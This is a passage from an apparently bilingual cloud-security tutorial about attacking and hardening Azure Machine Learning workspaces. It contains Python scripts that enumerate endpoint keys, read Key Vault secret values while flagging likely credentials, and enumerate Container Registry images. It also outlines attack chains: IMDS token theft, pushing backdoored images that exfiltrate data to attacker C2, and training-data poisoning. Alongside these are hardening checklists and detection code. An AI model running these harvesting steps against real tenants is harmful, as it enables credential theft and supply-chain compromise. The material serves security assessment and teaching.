ml_client = MLClient(
    DefaultAzureCredential(),
    subscription_id="...",
    resource_group_name="...",
    workspace_name="..."
)
 
for endpoint in ml_client.online_endpoints.list():
    print(f"\n=== Endpoint: {endpoint.name} ===")
    print(f"  Auth mode: {endpoint.auth_mode}")
    print(f"  Scoring URI: {endpoint.scoring_uri}")
 
    # Verkrijg endpoint-sleutels bij key-based auth
    if endpoint.auth_mode == "key":
        keys = ml_client.online_endpoints.get_keys(endpoint.name)
        print(f"  Primary key: {keys.primary_key[:10]}...")
        print(f"  Secondary key: {keys.secondary_key[:10]}...")

4. Extractie van Key Vault-secrets

from azure.keyvault.secrets import SecretClient
from azure.identity import DefaultAzureCredential
 
# Azure ML-workspaces hebben een bijbehorende Key Vault
kv_client = SecretClient(
    vault_url="https://my-workspace-kv.vault.azure.net/",
    credential=DefaultAzureCredential()
)
 
# Lijst en lees secrets
for secret in kv_client.list_properties_of_secrets():
    print(f"Secret: {secret.name}")
    value = kv_client.get_secret(secret.name)
    print(f"  Value: {value.value[:50]}...")

Uitgebreide Key Vault-inventarisatie

from azure.keyvault.secrets import SecretClient
from azure.keyvault.keys import KeyClient
from azure.keyvault.certificates import CertificateClient
from azure.identity import DefaultAzureCredential
 
credential = DefaultAzureCredential()
vault_url = "https://my-workspace-kv.vault.azure.net/"
 
# Inventariseer secrets
secret_client = SecretClient(vault_url=vault_url, credential=credential)
print("=== Secrets ===")
for secret in secret_client.list_properties_of_secrets():
    print(f"  {secret.name} (enabled: {secret.enabled}, "
          f"created: {secret.created_on})")
    # Categoriseer op naamgevingsconventie
    if any(kw in secret.name.lower() for kw in
           ['connection', 'storage', 'sql', 'password', 'key', 'token']):
        print(f"    [HIGH VALUE] Likely credential or connection string")
 
# Inventariseer keys (gebruikt voor encryptie, ondertekening)
key_client = KeyClient(vault_url=vault_url, credential=credential)
print("\n=== Keys ===")
for key in key_client.list_properties_of_keys():
    print(f"  {key.name} (type: {key.key_type}, ops: {key.allowed_operations})")
 
# Inventariseer certificaten
cert_client = CertificateClient(vault_url=vault_url, credential=credential)
print("\n=== Certificates ===")
for cert in cert_client.list_properties_of_certificates():
    print(f"  {cert.name} (expires: {cert.expires_on})")

5. Misbruik van de Container Registry

import requests

def enumerate_acr(acr_name, token):
    """Enumerate repositories and images in Azure Container Registry."""
    registry = f"{acr_name}.azurecr.io"
    acr_url = f"https://{registry}"

    # Exchange the managed identity (Entra ID) token for an ACR refresh token
    refresh_token = requests.post(f"{acr_url}/oauth2/exchange", data={
        "grant_type": "access_token",
        "service": registry,
        "access_token": token
    }).json().get("refresh_token")

    def acr_headers(scope):
        # The refresh token cannot call the registry API directly;
        # trade it for a short-lived access token scoped to the request
        access_token = requests.post(f"{acr_url}/oauth2/token", data={
            "grant_type": "refresh_token",
            "service": registry,
            "scope": scope,
            "refresh_token": refresh_token
        }).json().get("access_token")
        return {"Authorization": f"Bearer {access_token}"}

    # List repositories
    repos = requests.get(
        f"{acr_url}/v2/_catalog",
        headers=acr_headers("registry:catalog:*")
    ).json()

    for repo in repos.get("repositories", []):
        print(f"Repository: {repo}")
        repo_headers = acr_headers(f"repository:{repo}:pull")
        # List tags
        tags = requests.get(
            f"{acr_url}/v2/{repo}/tags/list",
            headers=repo_headers
        ).json()
        for tag in (tags.get("tags") or [])[:5]:
            print(f"  Tag: {tag}")
            # Fetch the manifest for image analysis
            manifest = requests.get(
                f"{acr_url}/v2/{repo}/manifests/{tag}",
                headers={
                    **repo_headers,
                    "Accept": "application/vnd.docker.distribution.manifest.v2+json"
                }
            ).json()
            print(f"  Layers: {len(manifest.get('layers', []))}")

6. Network isolation assessment

import requests
 
def assess_network_isolation(token, subscription_id, resource_group, workspace_name):
    """Assess whether an Azure ML workspace has proper network isolation."""
    base_url = "https://management.azure.com"
    headers = {"Authorization": f"Bearer {token}"}
 
    # Fetch workspace details
    ws_url = (
        f"{base_url}/subscriptions/{subscription_id}"
        f"/resourceGroups/{resource_group}"
        f"/providers/Microsoft.MachineLearningServices"
        f"/workspaces/{workspace_name}"
        f"?api-version=2023-10-01"
    )
    ws = requests.get(ws_url, headers=headers).json()
 
    props = ws.get("properties", {})
    results = {
        "public_network_access": props.get("publicNetworkAccess", "Unknown"),
        "private_endpoints": [],
        "managed_network": props.get("managedNetwork", {}),
    }
 
    # Check for private endpoint connections
    pe_connections = props.get("privateEndpointConnections", [])
    for pe in pe_connections:
        pe_props = pe.get("properties", {})
        results["private_endpoints"].append({
            "name": pe.get("name"),
            "status": pe_props.get("privateLinkServiceConnectionState", {}).get("status")
        })
 
    # Assess risk
    if results["public_network_access"] == "Enabled":
        print("[CRITICAL] Public network access is enabled")
    if not results["private_endpoints"]:
        print("[HIGH] No private endpoints configured")
 
    return results

Defensive assessment checklist

When assessing the security posture of Azure ML, verify these controls:

Control area	What to check	MITRE ATLAS reference
Identity	Managed identity scope, conditional access policies, RBAC assignments	AML.T0003 (ML Model Access)
Network	VNet integration, private endpoints, NSG rules, public endpoint exposure	AML.T0002 (Active Scanning)
Data	Storage encryption, datastore credential type, public blob access	AML.T0008 (Collection)
Compute	Instance isolation, SSH access, idle shutdown, patching	AML.T0004 (Full Model Access)
Registry	ACR access controls, image signing, vulnerability scanning	AML.T0018 (Backdoor ML Model)
Secrets	Key Vault access policies, secret rotation, soft delete enabled	AML.TA0008 (Collection)
Monitoring	Diagnostic settings, Azure Sentinel integration, audit logs	AML.TA0006 (Defense Evasion)

Recommended hardening

Use user-assigned managed identities with least-privilege RBAC instead of broadly scoped system-assigned identities.
Enable VNet integration with private endpoints for the workspace, storage accounts, Key Vault, and ACR.
Set publicNetworkAccess to Disabled for all workspace resources.
Use credential passthrough for datastores instead of storing account keys in Key Vault.
Enable ACR content trust and scan images for vulnerabilities before deploying them.
Enforce auth_mode: aad_token on endpoints instead of key-based authentication.
Enable Azure Sentinel with the ML workspace's diagnostic settings for security monitoring.
Rotate endpoint keys on a regular schedule and after any suspected compromise.
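
Several of these recommendations can be checked mechanically against resource definitions that have already been fetched. The following is a minimal sketch, not an official audit tool: the function name `check_hardening` is hypothetical, and the field names (`identity.type`, `properties.publicNetworkAccess`, `properties.privateEndpointConnections`, `properties.authMode`) are assumptions about the shape of the ARM JSON for a workspace and its online endpoints.

```python
def check_hardening(workspace, endpoints):
    """Return a list of findings for a workspace dict and its endpoint dicts.

    Both arguments are assumed to be ARM-style JSON already loaded into
    Python dicts; no network calls are made here.
    """
    findings = []
    props = workspace.get("properties", {})

    # Public network access should be explicitly disabled
    if props.get("publicNetworkAccess") != "Disabled":
        findings.append("workspace: publicNetworkAccess is not Disabled")

    # At least one private endpoint connection is expected
    if not props.get("privateEndpointConnections"):
        findings.append("workspace: no private endpoint connections")

    # Prefer a user-assigned identity that can be scoped independently
    identity_type = workspace.get("identity", {}).get("type", "")
    if "UserAssigned" not in identity_type:
        findings.append("workspace: no user-assigned managed identity")

    # Endpoints should use Entra ID tokens rather than static keys
    for ep in endpoints:
        auth_mode = str(ep.get("properties", {}).get("authMode", ""))
        # Normalize so that both "AADToken" and "aad_token" are accepted
        if auth_mode.replace("_", "").lower() != "aadtoken":
            findings.append(
                f"endpoint {ep.get('name')}: authMode is {auth_mode or 'unset'}"
            )
    return findings


# Example with made-up resource definitions
example_ws = {
    "identity": {"type": "SystemAssigned"},
    "properties": {"publicNetworkAccess": "Enabled"},
}
example_eps = [{"name": "scoring", "properties": {"authMode": "Key"}}]
for finding in check_hardening(example_ws, example_eps):
    print(finding)
```

Keeping the evaluation separate from the API calls makes the same checks reusable against exported templates or cached inventory data.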

Common attack chains

Real-world Azure ML engagements typically combine multiple techniques. These are common attack chains, ordered by impact:

Chain 1: From compute to subscription takeover

1. Initial access via malicious notebook or compromised data scientist credentials
2. Extract managed identity token from IMDS (169.254.169.254)
3. Enumerate role assignments to discover overprivileged identity
4. Access Key Vault secrets (storage keys, API credentials, connection strings)
5. Use storage keys to access blob containers across the subscription
6. Discover secrets in non-ML Key Vaults shared by the managed identity
7. Pivot to databases, APIs, or other services using extracted credentials
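
Step 3 of this chain, spotting an overprivileged identity, comes down to checking which role is assigned at which scope. The sketch below assumes the role assignments were already retrieved as ARM-style dicts with `properties.principalId`, `properties.scope`, and `properties.roleDefinitionId`; the helper names `scope_level` and `flag_overprivileged` are hypothetical, and the choice to flag only the three built-in roles listed here at subscription scope or broader is a simplification.

```python
# Built-in role definition GUIDs for roles that are dangerous at broad scope
BROAD_ROLES = {
    "8e3af657-a8ff-443c-a75c-2fe8c4bcb635": "Owner",
    "b24988ac-6180-42a0-ab88-20f7382dd24c": "Contributor",
    "18d7d88d-d35e-4fb5-a5c3-7773c20a72d9": "User Access Administrator",
}
BROAD_LEVELS = {"root", "management_group", "subscription"}


def scope_level(scope):
    """Classify an ARM scope string by how much of the tenant it covers."""
    parts = [p for p in scope.strip("/").split("/") if p]
    lowered = [p.lower() for p in parts]
    if not parts:
        return "root"
    if lowered[:2] == ["providers", "microsoft.management"]:
        return "management_group"
    if len(parts) == 2 and lowered[0] == "subscriptions":
        return "subscription"
    if len(parts) == 4 and lowered[2] == "resourcegroups":
        return "resource_group"
    return "resource"


def flag_overprivileged(assignments, principal_id):
    """Return (role, level, scope) tuples for broad assignments of one principal."""
    flagged = []
    for assignment in assignments:
        props = assignment.get("properties", {})
        if props.get("principalId") != principal_id:
            continue
        # The role GUID is the last path segment of roleDefinitionId
        role_guid = props.get("roleDefinitionId", "").rsplit("/", 1)[-1].lower()
        role = BROAD_ROLES.get(role_guid)
        level = scope_level(props.get("scope", ""))
        if role and level in BROAD_LEVELS:
            flagged.append((role, level, props.get("scope", "")))
    return flagged
```

The same function serves a defender reviewing a workspace identity before an attacker does: an empty result for the workspace's principal ID is the desired outcome.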

Chain 2: Model supply-chain attack

1. Enumerate ACR repositories via workspace managed identity
2. Identify inference container images used by production endpoints
3. Pull the target image, inject a backdoor (data exfiltration layer)
4. Push the modified image with the same tag (no immutability)
5. Trigger endpoint redeployment (or wait for next scheduled update)
6. Backdoored model now exfiltrates inference data to attacker C2
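
Because step 4 relies on a tag being silently re-pointed at a new image, one way to detect it is to pin the manifest digest of each production tag and compare it periodically. This is a minimal sketch under the assumption that digests have been collected elsewhere (for example from the `Docker-Content-Digest` response header of a manifest request); the function name `find_tag_drift` and the `repo:tag` key format are hypothetical.

```python
def find_tag_drift(baseline, current):
    """Compare pinned digests against currently observed digests.

    Both arguments map "repo:tag" to a manifest digest string.
    Returns (reference, pinned_digest, observed_digest) tuples for every
    reference whose digest changed or that is no longer present.
    """
    drift = []
    for ref, pinned in sorted(baseline.items()):
        observed = current.get(ref)  # None when the tag has disappeared
        if observed != pinned:
            drift.append((ref, pinned, observed))
    return drift


# Example with made-up digests
pinned = {"inference/scoring:prod": "sha256:aaa", "training/base:v3": "sha256:bbb"}
seen = {"inference/scoring:prod": "sha256:ccc", "training/base:v3": "sha256:bbb"}
for ref, old, new in find_tag_drift(pinned, seen):
    print(f"{ref}: {old} -> {new}")
```

Deploying by digest rather than by tag removes the need for this check, since a digest reference cannot be redirected to different content.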

Chain 3: Training pipeline manipulation

1. Access workspace via compromised compute instance
2. Enumerate datastores and identify training data locations
3. Modify training data in blob storage to inject backdoor examples
4. Wait for scheduled retraining pipeline to execute
5. Backdoored model is registered in model registry
6. Backdoored model is deployed to production endpoint
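
The tampering in step 3 only succeeds if nothing verifies the training data before retraining starts. A hash manifest is one possible guard; the sketch below works on in-memory bytes to stay self-contained, and the names `build_manifest` and `diff_manifests` are hypothetical. In a real pipeline the bytes would come from the blob store, and the trusted manifest would need to live somewhere the compute identity cannot write to.

```python
import hashlib


def build_manifest(blobs):
    """Map each blob name to the SHA-256 hex digest of its content."""
    return {name: hashlib.sha256(data).hexdigest() for name, data in blobs.items()}


def diff_manifests(trusted, observed):
    """Report blobs that were added, removed, or modified since the trusted snapshot."""
    trusted_names, observed_names = set(trusted), set(observed)
    return {
        "added": sorted(observed_names - trusted_names),
        "removed": sorted(trusted_names - observed_names),
        "modified": sorted(
            name for name in trusted_names & observed_names
            if trusted[name] != observed[name]
        ),
    }


# Example with made-up training files
snapshot = build_manifest({"train/a.csv": b"x,y\n1,0\n", "train/b.csv": b"x,y\n2,1\n"})
today = build_manifest({"train/a.csv": b"x,y\n1,1\n", "train/c.csv": b"x,y\n3,0\n"})
print(diff_manifests(snapshot, today))
```

A retraining job could run this comparison as its first step and refuse to continue when any of the three lists is non-empty without an approved change.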

MITRE ATLAS mapping for Azure ML attacks

Attack technique	ATLAS ID	Azure ML-specific context
IMDS managed identity token extraction	AML.TA0002 (Initial Access)	Workspace MI with broad RBAC scope
Datastore enumeration	AML.T0000 (Search for Victim's Data)	Registered datastores reveal all connected storage
Endpoint reconnaissance	AML.T0002 (Active Scanning)	Endpoints may use key-based auth without rotation
Model extraction via endpoint	AML.T0024 (Model Extraction)	Online endpoints serving model predictions
ACR image tampering	AML.T0018 (Backdoor ML Model)	Replace training/inference images in ACR
Key Vault lateral movement	AML.TA0008 (Collection)	Workspace Key Vault stores cross-service secrets
Training data poisoning via blob	AML.T0020 (Data Poisoning)	Modify training data in connected blob storage

Cross-platform comparison

Attack vector	Azure ML	AWS SageMaker	GCP Vertex AI
Credential source	IMDS (managed identity)	IMDS (IAM role)	Metadata server (SA token)
Primary storage	Blob Storage / ADLS	S3	GCS
Container registry	Azure Container Registry	Amazon ECR	Artifact Registry
Secret management	Key Vault (auto-created)	Secrets Manager / SSM	Secret Manager
Network isolation	VNet + Private Endpoints	VPC + VPC Endpoints	VPC-SC + Private Google Access
Biggest risk	Key Vault cross-service exposure	IAM role overprivilege	Service account `Editor` role

Related topics

Cloud AI infrastructure -- Cross-platform overview
GCP Vertex AI -- GCP comparison
AWS SageMaker -- AWS comparison

References

"Azure Machine Learning Security Baseline" - Microsoft (2024) - Official security configuration guidance
"Securing Azure Machine Learning Workspaces" - Microsoft Learn (2024) - Workspace isolation and access control
"Managed Identity Best Practices" - Microsoft (2024) - Guidance on limiting managed identity scope
"Azure Security Benchmark v3" - Microsoft (2023) - Cross-service security controls applicable to Azure ML

Knowledge Check

What makes Azure ML's Key Vault integration a significant attack surface?
